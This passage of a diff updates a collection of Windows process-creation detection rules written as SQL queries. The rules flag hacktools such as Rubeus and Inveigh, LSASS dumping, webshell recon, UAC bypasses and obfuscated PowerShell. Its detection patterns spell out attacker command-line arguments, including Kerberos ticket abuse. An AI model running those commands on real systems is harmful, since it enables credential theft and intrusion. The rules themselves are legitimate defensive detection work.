Could indicate possible command/argument confusion/hijacking", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Java tools are known to produce false-positive when loading libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_connection_strings_decryption.yml" + "filename": "proc_creation_win_cmd_path_traversal.yml" }, { - "title": "APT31 Judgement Panda Activity", - "id": "03e2746e-2b31-42f1-ab7a-eb39365b2422", - "status": "test", - "description": "Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report", - "author": "Florian Roth (Nextron Systems)", + "title": "Chopper Webshell Process Pattern", + "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", + "status": "experimental", + "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "author": "Florian Roth (Nextron 
Systems), MSTI (query)", "tags": [ - "attack.lateral_movement", - "attack.credential_access", - "attack.g0128", - "attack.t1003.001", - "attack.t1560.001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ldifde%' ESCAPE '\\' AND CommandLine LIKE '%-f -n%' ESCAPE '\\' AND CommandLine LIKE '%eprod.ldf%' ESCAPE '\\') OR (CommandLine LIKE '%copy \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%c$%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\aaaa\\\\procdump64.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\netsess.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\7za.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\aaaa\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt31_judgement_panda.yml" + "filename": "proc_creation_win_webshell_chopper.yml" }, { - "title": "CMSTP Execution Process Creation", - "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Reg Add Suspicious Paths", + "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", + "status": "experimental", + "description": "Detects when an 
adversary uses the reg.exe utility to add or modify new keys or subkeys", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1112", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Rare legitimate add to registry via cli (to these locations)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmstp_execution_by_creation.yml" + "filename": "proc_creation_win_reg_susp_paths.yml" }, { - "title": "Potential MsiExec Masquerading", - "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", - "status": "test", - "description": "Detects the execution of msiexec.exe from an uncommon directory", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ], + "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", + "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "status": "experimental", + "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth 
Remote Code Execution (RCE)", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_masquerading.yml" + "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" }, { - "title": "Suspicious DLL Loaded via CertOC.EXE", - "id": "84232095-ecca-4015-b0d7-7726507ee793", + "title": "Suspicious Greedy Compression Using Rar.EXE", + "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", "status": "experimental", - "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", + "author": "X__Junior (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - 
"SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" + "filename": "proc_creation_win_rar_susp_greedy_compression.yml" }, { - "title": "UAC Bypass Tools Using ComputerDefaults", - "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "title": "UAC Bypass Using Windows Media Player - Process", + "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", "status": "test", - "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", "author": 
"Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", 
@@ -8278,894 +8036,904 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (IntegrityLevel IN ('High', 'System') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" ], - "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" + "filename": "proc_creation_win_uac_bypass_wmp.yml" }, { - "title": "HackTool - Rubeus Execution", - "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", - "status": "stable", - "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - Inveigh Execution", + "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", + "status": "experimental", + "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Very unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '% asreproast 
%' ESCAPE '\\' OR CommandLine LIKE '% dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '% dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '% kerberoast %' ESCAPE '\\' OR CommandLine LIKE '% createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '% ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% /impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '% renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '% harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% hash /password:%' ESCAPE '\\' OR CommandLine LIKE '% golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '% silver /user:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_rubeus.yml" + "filename": "proc_creation_win_hktl_inveigh.yml" }, { - "title": "Potential Russian APT Credential Theft Activity", - "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", - "status": "stable", - "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "title": "Renamed AdFind Execution", + "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", + "status": "test", + "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. 
It is used to domain trust discovery to plan out subsequent steps in the attack chain.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (NewProcessName LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" + "filename": "proc_creation_win_renamed_adfind.yml" }, { - "title": "Findstr LSASS", - "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "title": "Suspicious WERMGR Process Patterns", + "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", "status": "experimental", - "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_findstr_lsass.yml" + "filename": "proc_creation_win_wermgr_susp_child_process.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", - "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "title": "HackTool - CreateMiniDump Execution", + "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", "status": "test", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" + "filename": "proc_creation_win_hktl_createminidump.yml" }, { - "title": "PowerShell Base64 Encoded 
FromBase64String Keyword", - "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", - "status": "test", - "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", + "title": "Phishing Pattern ISO in Archive", + "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "status": "experimental", + "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.execution", - "attack.t1059.001" + "attack.initial_access", + "attack.t1566" ], "falsepositives": [ - "Unknown" + "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_frombase64string.yml" + "filename": 
"proc_creation_win_susp_archiver_iso_phishing.yml" }, { - "title": "APT27 - Emissary Panda Activity", - "id": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", + "title": "Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call", + "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", "status": "test", - "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious base64 encoded and obfuscated \"LOAD\" keyword used in .NET \"reflection.assembly\"", + "author": "pH-T (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1574.002", - "attack.g0027" + "attack.t1059.001", + "attack.t1027" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\sllauncher.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%-k%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR 
CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt27_emissary_panda.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml" }, { - "title": "Webshell Recon Detection Via CommandLine & Processes", - "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "title": "PowerShell Get-Process LSASS", + "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", "status": "test", - "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", - "author": "Cian Heasley, Florian Roth", + "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE 
